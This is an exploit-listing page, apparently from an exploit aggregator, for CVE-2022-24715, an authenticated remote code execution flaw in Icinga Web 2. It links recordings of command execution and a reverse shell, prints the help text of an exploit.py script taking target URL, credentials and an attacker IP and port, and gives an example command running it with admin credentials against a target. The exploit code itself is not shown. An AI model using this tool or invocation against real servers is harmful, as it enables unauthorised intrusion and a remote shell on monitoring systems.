Exploit for Path Traversal in Icinga Icinga Web 2 CVE-2022-24715

Name: Exploit for Path Traversal in Icinga Icinga Web 2 CVE-2022-24715
Rating: 5 (130 reviews)

2023-07-08 | CVSS 6.0

## https://sploitus.com/exploit?id=FE48662D-4928-5A89-A7D2-9131D5A2325F
Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10

# Remote command execution 

[![asciicast](https://asciinema.org/a/595672.png)](https://asciinema.org/a/595672)

# Reverse shell

[![asciicast](https://asciinema.org/a/595675.png)](https://asciinema.org/a/595675)

# Usage
```
usage: exploit.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT

Welcome.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Insert URL http://ip_victima
  -U USER, --user USER  Insert user -U user
  -P PASSWORD, --password PASSWORD
                        Insert password -P password
  -i IP, --ip IP        Insert IP_ATTACK -i IP
  -p PORT, --port PORT  Insert PORT_ATTACK -p PORT

```

# example
```
python3 exploit.py -u http://localhost -U admin  -P admin123 -i 192.168.1.1 -p 443
```